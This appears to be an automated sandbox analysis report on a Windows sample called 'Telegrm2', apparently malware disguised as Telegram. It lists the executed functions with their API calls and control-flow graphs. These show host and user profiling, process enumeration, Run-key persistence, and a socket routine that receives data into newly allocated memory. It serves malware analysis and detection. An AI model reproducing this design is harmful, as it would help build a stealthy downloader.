calls _cftoe_l 25581->25623 25585 30a3808 25583->25585 25622 30b3c68 62 API calls 2 library calls 25585->25622 25586 30a382d GetModuleFileNameA 25588 30b23a0 82 API calls 25586->25588 25589 30a384e 25588->25589 25590 30b23a0 82 API calls 25589->25590 25591 30a3863 25590->25591 25624 30a2750 71 API calls ctype 25591->25624 25593 30a38a8 25594 30b2c00 _cftoe_l 8 API calls 25593->25594 25595 30a38cd 25594->25595 25595->25522 25596->25530 25597->25524 25598->25511 25600 30b82c0 _recalloc 25599->25600 25601 30a346a GetCurrentHwProfileA 25600->25601 25625 30b3550 25601->25625 25604 30a34d2 ctype 25605 30b2c00 _cftoe_l 8 API calls 25604->25605 25606 30a354d lstrcat 25605->25606 25606->25553 25608 30a329b 25607->25608 25609 30b2c00 _cftoe_l 8 API calls 25608->25609 25610 30a32ca 25609->25610 25610->25560 25612 30a3141 FindCloseChangeNotification 25611->25612 25614 30a30ae 25611->25614 25615 30a4a30 73 API calls 25614->25615 25616 30a3118 Process32Next 25614->25616 25627 30b34ec 25614->25627 25615->25614 25616->25614 25617 30a3128 25616->25617 25617->25612 25618->25567 25619->25579 25620->25571 25621->25574 25622->25581 25623->25586 25624->25593 25626 30a3488 GetComputerNameA 25625->25626 25626->25604 25628 30b34f9 25627->25628 25630 30b351d 25627->25630 25629 30b3200 _errno 62 API calls 25628->25629 25628->25630 25631 30b3503 25629->25631 25632 30b5708 _invalid_parameter_noinfo 17 API calls 25631->25632 25633 30b350e 25632->25633 25633->25614 25634 30a4430 25635 30b82c0 _recalloc 25634->25635 25636 30a4450 RegisterClassExA 25635->25636 25637 30a448c GetModuleHandleA CreateWindowExA 25636->25637 25638 30a4481 25636->25638 25637->25638 25639 30a44db GetMessageA 25637->25639 25640 30a44f2 25639->25640 25641 30a4524 25639->25641 25640->25641 25642 30a44f7 TranslateMessage DispatchMessageA GetMessageA 25640->25642 25642->25640 25642->25641 25643 30a17d0 8 API calls 25644 30a1956 RegCloseKey 25643->25644 25645 30a18c5 RegOpenKeyExA 25643->25645 25647 30a1968 25644->25647 25645->25644 25646 30a18ea 25645->25646 25648 30a191f lstrlen RegSetValueExA 25646->25648 25649 30a18ef 25646->25649 25650 30a196d FreeLibrary 25647->25650 25651 30a1976 25647->25651 25648->25644 25649->25644 25652 30a18f4 RegSetValueExA 25649->25652 25650->25651 25652->25644 25653 30a191a 25652->25653 25653->25644

                                            Executed Functions

                                            Function 030A3560 Relevance: 43.9, APIs: 11, Strings: 14, Instructions: 188librarystringprocessCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 030A3430: GetCurrentHwProfileA.ADVAPI32 ref: 030A346F
                                              • Part of subcall function 030A3430: GetComputerNameA.KERNEL32 ref: 030A34C5
                                            • lstrcat.KERNEL32 ref: 030A35C6
                                              • Part of subcall function 030B21D0: GetComputerNameA.KERNEL32 ref: 030B222B
                                              • Part of subcall function 030B21D0: lstrcpy.KERNEL32 ref: 030B2241
                                              • Part of subcall function 030B21D0: wsprintfA.USER32 ref: 030B2270
                                            • GetComputerNameA.KERNEL32 ref: 030A35FF
                                            • GetCurrentProcessId.KERNEL32 ref: 030A3612
                                            • LoadLibraryA.KERNEL32 ref: 030A367A
                                            • GetProcAddress.KERNEL32 ref: 030A368A
                                            • GetUserNameA.ADVAPI32 ref: 030A3699
                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 030A3703
                                            • lstrlen.KERNEL32 ref: 030A3763
                                            • _localtime64.LIBCMT ref: 030A377C
                                            • wsprintfA.USER32 ref: 030A37B2
                                            • GetModuleFileNameA.KERNEL32 ref: 030A383C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Name$Computer$Currentwsprintf$AddressCreateFileLibraryLoadModuleProcProcessProfileSnapshotToolhelp32User_localtime64lstrcatlstrcpylstrlen
                                            • String ID: %d-%d-%d %d:%d$.dll$2$2$Adva$GetU$Group$Remark$Time$ameA$driver$pi32$run$serN
                                            • API String ID: 2203227563-3218832578
                                            • Opcode ID: 8e76ec19f0f502fe73221a0a13920063b4f3298df5173a447203ace972de1749
                                            • Instruction ID: e27d9709ae3794f085cce558990f7f7e069726cd5f7a6041632e4d78731b5c2e
                                            • Opcode Fuzzy Hash: 8e76ec19f0f502fe73221a0a13920063b4f3298df5173a447203ace972de1749
                                            • Instruction Fuzzy Hash: E891AE36216BC08AE721DF78E8643DD7765F7807A4F908326DA594BAE8DF78C645C700
                                            Function 030A17D0 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 112libraryloaderregistryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • LoadLibraryA.KERNEL32 ref: 030A1806
                                            • GetProcAddress.KERNEL32 ref: 030A1819
                                            • GetProcAddress.KERNEL32 ref: 030A182E
                                            • GetProcAddress.KERNEL32 ref: 030A1841
                                            • GetProcAddress.KERNEL32 ref: 030A1851
                                            • GetProcAddress.KERNEL32 ref: 030A1861
                                            • GetProcAddress.KERNEL32 ref: 030A1876
                                            • RegCreateKeyExA.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,Time,030B219F), ref: 030A18B9
                                            • RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,Time,030B219F), ref: 030A18E2
                                            • RegSetValueExA.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,Time,030B219F), ref: 030A1913
                                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,Time,030B219F), ref: 030A192A
                                            • RegSetValueExA.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,Time,030B219F), ref: 030A1949
                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,Time,030B219F), ref: 030A195D
                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,Time,030B219F), ref: 030A1970
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: AddressProc$LibraryValue$CloseCreateFreeLoadOpenlstrlen
                                            • String ID: ?$ADVAPI32.dll$RegCloseKey$RegCreateKeyExA$RegDeleteKeyA$RegDeleteValueA$RegOpenKeyExA$RegSetValueExA$Time
                                            • API String ID: 4166182170-2474000227
                                            • Opcode ID: 14014c8cb4e149271cbad4aafa1c0eef43e85b9e77fdb354fec79f0d9413f6f3
                                            • Instruction ID: 65edd73034a0b0d3e147a7dfc0eb438bc46f00775d171e66ac858cd2e9c4f0f8
                                            • Opcode Fuzzy Hash: 14014c8cb4e149271cbad4aafa1c0eef43e85b9e77fdb354fec79f0d9413f6f3
                                            • Instruction Fuzzy Hash: 4C41543631AB5186D751CB56F86075AB369F784BE4F405211ED9D43B28DF3CC54AC708
                                            Function 030A14C0 Relevance: 38.7, APIs: 14, Strings: 8, Instructions: 174libraryloaderregistryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: AddressProc$Library$CloseFreeLoadOpenlstrcpy
                                            • String ID: %08X$ADVAPI32.dll$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA$Remark
                                            • API String ID: 2622296002-4222392007
                                            • Opcode ID: 365d0e112e7cdaa6982ef6da38e7ea94118737f30474664e1cd6f0c1e0a991be
                                            • Instruction ID: e202778917aaf57e80c4bcef9cc754d06c2eebf19a863dc3447d4dadcba017a9
                                            • Opcode Fuzzy Hash: 365d0e112e7cdaa6982ef6da38e7ea94118737f30474664e1cd6f0c1e0a991be
                                            • Instruction Fuzzy Hash: 3D714236226E8081DB65CB15F85079FB3A8FB897D4F846212EA8E47B68DF3CC545CB44
                                            Function 030A4530 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 145librarymemoryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Handle$Close$AddressProcProtectVirtual$CreateLibraryLoadModuleObjectSingleThreadWaitlstrcpy
                                            • String ID: Mov$NtTerminateThread$NtTraceEvent$driver$ntdll.dll$run
                                            • API String ID: 2320672033-2918648053
                                            • Opcode ID: 7a5dca087edb96a4302cfdfd0e7cdbea805d909dcffbbf1a316fdf902481826f
                                            • Instruction ID: 28daf4ee0bfc7c39caa0778b68e8057b99f5f1dd1585735796a01253e4e8b562
                                            • Opcode Fuzzy Hash: 7a5dca087edb96a4302cfdfd0e7cdbea805d909dcffbbf1a316fdf902481826f
                                            • Instruction Fuzzy Hash: 1651D33572AB8182EB61DF65F8643EA73A8F789B84F845215DA4E47B64DF3CC205C704
                                            Function 02337C69 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 389COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 151 2337c69-2337cab call 2337ef0 * 3 158 2337cf5-2337d07 151->158 159 2337cad-2337cdb call 2337ef0 * 2 151->159 164 2337ec8-2337edb call 2338120 158->164 165 2337d0d-2337d16 158->165 159->164 176 2337ce1-2337cf4 159->176 171 2337f25-2337f37 socket 164->171 172 2337edd-2337f0b call 2338120 * 2 164->172 168 2337d20-2337d34 165->168 174 2337d36-2337e0c call 23381e0 call 2338120 * 2 168->174 177 23380f8-2338114 171->177 178 2337f3d-2337f46 171->178 172->177 193 2337f11-2337f24 172->193 174->164 176->158 181 2337f50-2337f64 178->181 187 2337f66-2337f7e 181->187 194 2337f82-2337f9a connect 187->194 193->171 194->194 195 2337f9c-2337fb1 send 194->195 195->177 196 2337fb7-2337fda recv 195->196 196->177 197 2337fe0-233805a NtAllocateVirtualMemory * 2 196->197 198 2338060-2338077 recv 197->198 198->177 199 2338079-2338088 198->199 200 2338090-233809f 199->200 200->200 201 23380a1-23380ab 200->201 201->198 202 23380ad-23380c9 closesocket 201->202 204 23380f2-23380f5 202->204 205 23380cb-23380f0 202->205 204->177 205->204
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904076317.0000000002337000.00000040.00000020.00020000.00000000.sdmp, Offset: 02337000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2337000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: AllocateMemoryVirtualrecv$closesocketconnectsendsocket
                                            • String ID: .$2$3$@$W$l
                                            • API String ID: 2164595095-707419712
                                            • Opcode ID: 61d3b5bf226623d215d539af48f8bdad59e48077ad1befe348dd8df2832adf7b
                                            • Instruction ID: ffe7cdd2f2e3fe812f92610b11219b5c5b79e42a4ea2ee192f80e53db736097b
                                            • Opcode Fuzzy Hash: 61d3b5bf226623d215d539af48f8bdad59e48077ad1befe348dd8df2832adf7b
                                            • Instruction Fuzzy Hash: 95C1E470208A088FDB69EF28C889BB9B7E1FF89304F50465DD48EC7266DB30D9468B41
                                            Function 030B0180 Relevance: 21.6, APIs: 8, Strings: 4, Instructions: 568COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 206 30b0180-30b0311 call 30ad960 * 5 call 30bd5f0 219 30b0328-30b0331 206->219 220 30b0313-30b0316 206->220 221 30b03b9-30b03bd 219->221 222 30b0337-30b033b 219->222 223 30b0318-30b031b 220->223 224 30b031d-30b0326 220->224 226 30b03c0-30b03c4 221->226 222->221 225 30b033d-30b035f call 30b427c 222->225 223->219 224->219 235 30b03ad-30b03b5 225->235 236 30b0361-30b0364 225->236 228 30b040a 226->228 229 30b03c6-30b03de 226->229 231 30b040e-30b0411 228->231 232 30b03e1-30b03e4 229->232 237 30b0a49-30b0a57 call 30b3288 231->237 238 30b0417-30b041a 231->238 233 30b03f9-30b0408 232->233 234 30b03e6-30b03f2 call 30ad550 232->234 233->231 234->228 248 30b03f4-30b03f7 234->248 235->221 240 30b038c-30b03ab 236->240 241 30b0366-30b0388 call 30b427c 236->241 250 30b0a59-30b0a5d call 30b2c20 237->250 251 30b0a62-30b0a7c 237->251 238->237 243 30b0420-30b0448 call 30b0b40 238->243 240->226 241->236 253 30b038a 241->253 255 30b044a-30b044f 243->255 256 30b04ad 243->256 248->232 250->251 257 30b0a8a-30b0aa8 251->257 258 30b0a7e-30b0a85 call 30b2c20 251->258 253->235 260 30b045a-30b0472 255->260 261 30b0451-30b0455 call 30b2c20 255->261 259 30b04b0-30b04b8 256->259 263 30b0aaa-30b0aae call 30b2c20 257->263 264 30b0ab3-30b0acb 257->264 258->257 268 30b04ba-30b04c1 call 30b2c20 259->268 269 30b04c6-30b04dc call 30b38a4 call 30b4238 259->269 271 30b0489-30b0490 260->271 272 30b0474-30b0487 call 30b2c40 260->272 261->260 263->264 266 30b0ad9-30b0aeb 264->266 267 30b0acd-30b0ad4 call 30b2c20 264->267 276 30b0af2-30b0af7 266->276 267->266 268->269 288 30b04e2-30b050c call 30b4250 269->288 275 30b0493-30b04ab 271->275 272->275 275->259 280 30b0af9-30b0afd call 30b2c20 276->280 281 30b0b02-30b0b33 call 30b2c00 276->281 280->281 291 30b050e-30b0612 call 30a4a30 CreateDirectoryA call 30b0b40 call 30b0fe0 call 30b10a0 call 30b0b40 call 30ad560 call 30afcf0 288->291 306 30b0618-30b06df call 30b0b40 call 30b0fe0 call 30b10a0 call 30b0b40 call 30ad560 call 30afcf0 291->306 307 30b06e6 291->307 306->307 363 30b06e1-30b06e4 306->363 309 30b06e9-30b06ed 307->309 311 30b06ef-30b06fa 309->311 312 30b0721-30b0725 309->312 313 30b0708-30b071a 311->313 314 30b06fc-30b0703 call 30b2c20 311->314 316 30b0759-30b075d 312->316 317 30b0727-30b0732 312->317 313->312 314->313 322 30b075f-30b076a 316->322 323 30b0791-30b0795 316->323 320 30b0740-30b0752 317->320 321 30b0734-30b073b call 30b2c20 317->321 320->316 321->320 326 30b0778-30b078a 322->326 327 30b076c-30b0773 call 30b2c20 322->327 328 30b07ad-30b07b0 323->328 329 30b0797-30b079f 323->329 326->323 327->326 330 30b099d-30b09ab call 30b3288 328->330 331 30b07b6-30b07cc call 30b38a4 call 30b4238 328->331 329->328 334 30b07a1-30b07a8 call 30b2c20 329->334 344 30b09ad-30b09b1 call 30b2c20 330->344 345 30b09b6-30b09ce 330->345 353 30b07d1-30b07fb call 30b4250 331->353 334->328 344->345 349 30b09dc-30b09fa 345->349 350 30b09d0-30b09d7 call 30b2c20 345->350 351 30b09fc-30b0a00 call 30b2c20 349->351 352 30b0a05-30b0a1d 349->352 350->349 351->352 357 30b0a2b-30b0a44 352->357 358 30b0a1f-30b0a26 call 30b2c20 352->358 364 30b07fd-30b084b call 30b0b40 call 30b0fe0 call 30b10a0 353->364 357->276 358->357 363->309 371 30b08ab-30b08b3 364->371 372 30b084d-30b0852 364->372 375 30b08c1-30b08e2 371->375 376 30b08b5-30b08bc call 30b2c20 371->376 373 30b085d-30b0872 372->373 374 30b0854-30b0858 call 30b2c20 372->374 378 30b0889-30b0890 373->378 379 30b0874-30b0887 call 30b2c40 373->379 374->373 381 30b08f0-30b0911 375->381 382 30b08e4-30b08eb call 30b2c20 375->382 376->375 385 30b0893-30b08a7 378->385 379->385 383 30b091f-30b0948 RegOpenKeyExA 381->383 384 30b0913-30b091a call 30b2c20 381->384 382->381 383->330 389 30b094a-30b0981 RegSetValueExA 383->389 384->383 385->371 391 30b0983-30b098d call 30b22c0 389->391 392 30b0992-30b0997 RegCloseKey 389->392 391->392 392->330
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: memchrrand$CreateDirectory
                                            • String ID: C:\ProgramData\$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$https://$run
                                            • API String ID: 578666947-266329106
                                            • Opcode ID: 2fa6c6c5489bc2db8f41f116ac784bc32710e8765344a12febe6479d68645345
                                            • Instruction ID: f35693b2d9e7c9aaaf040e8c6fdfab1818131790b753bea7aaa8f545324472c8
                                            • Opcode Fuzzy Hash: 2fa6c6c5489bc2db8f41f116ac784bc32710e8765344a12febe6479d68645345
                                            • Instruction Fuzzy Hash: BA426932212BC08AEB60DF39D8543DA77A5F7857A8F541626DA6E4BED8DF74C284C340
                                            Function 030B74B8 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 292timeCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 394 30b74b8-30b7500 call 30b9b98 call 30b829c call 30b8254 401 30b7911-30b7925 call 30b5664 394->401 402 30b7506-30b7515 call 30b81f4 394->402 407 30b7926-30b7935 401->407 408 30b751b-30b752a call 30b8224 402->408 409 30b78fd-30b790c call 30b5664 402->409 413 30b78e9-30b78f8 call 30b5664 408->413 414 30b7530-30b7567 call 30bc9f0 call 30b8b10 408->414 409->401 413->409 420 30b75fe-30b7608 414->420 421 30b756d-30b7570 414->421 423 30b760a-30b760f call 30b3d28 420->423 424 30b7616-30b7626 GetTimeZoneInformation 420->424 421->420 422 30b7576-30b7580 421->422 425 30b7582-30b758f call 30b4720 422->425 426 30b75a6-30b75c1 call 30b7410 call 30b52fc 422->426 423->424 428 30b774d 424->428 429 30b762c-30b7654 424->429 425->428 441 30b7595-30b759f 425->441 426->428 455 30b75c7-30b75e4 call 30b7410 call 30b739c 426->455 432 30b7752-30b7788 call 30b8294 call 30b8284 call 30b828c call 30b9a98 428->432 434 30b7656-30b765d 429->434 435 30b7664-30b766c 429->435 432->407 467 30b778e-30b77a6 call 30b3c68 432->467 434->435 439 30b766e-30b7676 435->439 440 30b7691-30b7699 435->440 439->440 444 30b7678-30b768f 439->444 445 30b76a1-30b76db WideCharToMultiByte 440->445 441->426 448 30b75a1 call 30b3d28 441->448 444->445 446 30b76dd-30b76e5 445->446 447 30b76f1-30b76f5 445->447 446->447 451 30b76e7-30b76ef 446->451 452 30b76f8-30b772e WideCharToMultiByte 447->452 448->426 451->452 456 30b7730-30b7738 452->456 457 30b7745-30b774a 452->457 455->432 468 30b75ea-30b75f9 call 30b5664 455->468 456->457 460 30b773a-30b7743 456->460 457->428 460->428 472 30b77ac-30b77b2 467->472 473 30b78d4-30b78e8 call 30b5664 467->473 468->420 474 30b77bb-30b77d7 call 30b4298 472->474 475 30b77b4-30b77b8 472->475 473->413 480 30b77da-30b77de 474->480 475->474 481 30b78cc-30b78cf 480->481 482 30b77e4-30b77e6 480->482 481->480 483 30b77e8-30b77eb 482->483 484 30b77f1-30b77f4 482->484 483->481 483->484 485 30b785a-30b785d 484->485 486 30b77f6-30b7817 call 30b4298 484->486 487 30b786a-30b7876 485->487 488 30b785f-30b7862 485->488 493 30b7821-30b7825 486->493 490 30b7878-30b788f call 30b3c68 487->490 491 30b78a6-30b78ab 487->491 488->487 494 30b78ae-30b78ca call 30b8294 call 30b8284 490->494 500 30b7891-30b78a5 call 30b5664 490->500 491->494 496 30b7819-30b781c 493->496 497 30b7827-30b782a 493->497 494->407 496->497 501 30b781e 496->501 497->485 502 30b782c-30b784a call 30b4298 497->502 500->491 501->493 510 30b7854-30b7858 502->510 510->485 511 30b784c-30b784f 510->511 511->485 512 30b7851 511->512 512->510
                                            APIs
                                            • _lock.LIBCMT ref: 030B74E3
                                              • Part of subcall function 030B9B98: _amsg_exit.LIBCMT ref: 030B9BC2
                                            • _get_daylight.LIBCMT ref: 030B74F9
                                              • Part of subcall function 030B8254: _errno.LIBCMT ref: 030B825D
                                              • Part of subcall function 030B8254: _invalid_parameter_noinfo.LIBCMT ref: 030B8268
                                            • _get_daylight.LIBCMT ref: 030B750E
                                              • Part of subcall function 030B81F4: _errno.LIBCMT ref: 030B81FD
                                              • Part of subcall function 030B81F4: _invalid_parameter_noinfo.LIBCMT ref: 030B8208
                                            • _get_daylight.LIBCMT ref: 030B7523
                                              • Part of subcall function 030B8224: _errno.LIBCMT ref: 030B822D
                                              • Part of subcall function 030B8224: _invalid_parameter_noinfo.LIBCMT ref: 030B8238
                                            • ___lc_codepage_func.LIBCMT ref: 030B7530
                                              • Part of subcall function 030BC9F0: _getptd.LIBCMT ref: 030BC9F4
                                              • Part of subcall function 030B8B10: __wtomb_environ.LIBCMT ref: 030B8B40
                                            • free.LIBCMT ref: 030B75A1
                                              • Part of subcall function 030B3D28: HeapFree.KERNEL32(?,?,00000000,030B4940,?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000), ref: 030B3D3E
                                              • Part of subcall function 030B3D28: _errno.LIBCMT ref: 030B3D48
                                              • Part of subcall function 030B3D28: GetLastError.KERNEL32(?,?,00000000,030B4940,?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000), ref: 030B3D50
                                            • free.LIBCMT ref: 030B760A
                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,00000000,?,00000032,00000000,00000000,030B7EDE,?,?,?,?,030B397E), ref: 030B761D
                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,?,00000032,00000000,00000000,030B7EDE,?,?,?,?,030B397E), ref: 030B76D3
                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,?,00000032,00000000,00000000,030B7EDE,?,?,?,?,030B397E), ref: 030B7726
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno$_get_daylight_invalid_parameter_noinfo$ByteCharMultiWidefree$ErrorFreeHeapInformationLastTimeZone___lc_codepage_func__wtomb_environ_amsg_exit_getptd_lock
                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                            • API String ID: 2532449802-239921721
                                            • Opcode ID: 00ae3ae72ab45225e3150a21b031adbc4ba2e3d4c08bf2791ec598021d2efe21
                                            • Instruction ID: 27173a8154effafa550159edd4bb43e5474e3e0fe93d8ac2954225dd8a1534f4
                                            • Opcode Fuzzy Hash: 00ae3ae72ab45225e3150a21b031adbc4ba2e3d4c08bf2791ec598021d2efe21
                                            • Instruction Fuzzy Hash: 39B104762067C08AEB71DF25E9907DE7BB9FBC5B80F488125DA895BB64DB38C511CB00
                                            Function 02337E99 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 250networkmemorynativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 531 2337e99-2337edb call 2338120 * 3 539 2337f25-2337f37 socket 531->539 540 2337edd-2337f0b call 2338120 * 2 531->540 542 23380f8-2338114 539->542 543 2337f3d-2337f46 539->543 540->542 552 2337f11-2337f24 540->552 545 2337f50-2337f64 543->545 549 2337f66-2337f7e 545->549 553 2337f82-2337f9a connect 549->553 552->539 553->553 554 2337f9c-2337fb1 send 553->554 554->542 555 2337fb7-2337fda recv 554->555 555->542 556 2337fe0-233805a NtAllocateVirtualMemory * 2 555->556 557 2338060-2338077 recv 556->557 557->542 558 2338079-2338088 557->558 559 2338090-233809f 558->559 559->559 560 23380a1-23380ab 559->560 560->557 561 23380ad-23380c9 closesocket 560->561 563 23380f2-23380f5 561->563 564 23380cb-23380f0 561->564 563->542 564->563
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904076317.0000000002337000.00000040.00000020.00020000.00000000.sdmp, Offset: 02337000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2337000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: AllocateMemoryVirtualrecv$closesocketconnectsendsocket
                                            • String ID: @
                                            • API String ID: 2164595095-2766056989
                                            • Opcode ID: 6f6fca268c260cf796c062aa84fbd870eaea35d8f5422593686423cebdaefd26
                                            • Instruction ID: 8c7105078dac66b7782f466b4d3fb011b2b324442c707224b0a22ff095d41480
                                            • Opcode Fuzzy Hash: 6f6fca268c260cf796c062aa84fbd870eaea35d8f5422593686423cebdaefd26
                                            • Instruction Fuzzy Hash: B671C130208B484FDB29EF2888987B9B7E1FB89305F10466ED58EC7252DF31D6468B81
                                            Function 02337EF0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 216networkmemorynativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 565 2337ef0-2337ef1 566 2337efa-2337f0b 565->566 567 2337ef5 call 2338120 565->567 569 2337f11-2337f37 socket 566->569 570 23380f8-2338114 566->570 567->566 569->570 572 2337f3d-2337f46 569->572 573 2337f50-2337f64 572->573 575 2337f66-2337f7e 573->575 577 2337f82-2337f9a connect 575->577 577->577 578 2337f9c-2337fb1 send 577->578 578->570 579 2337fb7-2337fda recv 578->579 579->570 580 2337fe0-233805a NtAllocateVirtualMemory * 2 579->580 581 2338060-2338077 recv 580->581 581->570 582 2338079-2338088 581->582 583 2338090-233809f 582->583 583->583 584 23380a1-23380ab 583->584 584->581 585 23380ad-23380b0 closesocket 584->585 586 23380b6-23380c9 585->586 587 23380f2-23380f5 586->587 588 23380cb-23380f0 586->588 587->570 588->587
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904076317.0000000002337000.00000040.00000020.00020000.00000000.sdmp, Offset: 02337000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2337000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: AllocateMemoryVirtualrecv$closesocketconnectsendsocket
                                            • String ID: @
                                            • API String ID: 2164595095-2766056989
                                            • Opcode ID: e6dd68fed869678d75c67ee59ff8d15df6a500a6c8c54ae664d3e12eda6eada1
                                            • Instruction ID: 582e7637cf9a5af42759fd6b423c07487b0cae2b8232d05ab7155e8e323a0cd2
                                            • Opcode Fuzzy Hash: e6dd68fed869678d75c67ee59ff8d15df6a500a6c8c54ae664d3e12eda6eada1
                                            • Instruction Fuzzy Hash: DA61CF30208A488FCB29DF28D899BE9B7E0FF89315F14466ED59EC7152DF30D6468B81
                                            Function 030A1E80 Relevance: 13.7, APIs: 9, Instructions: 220memorythreadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
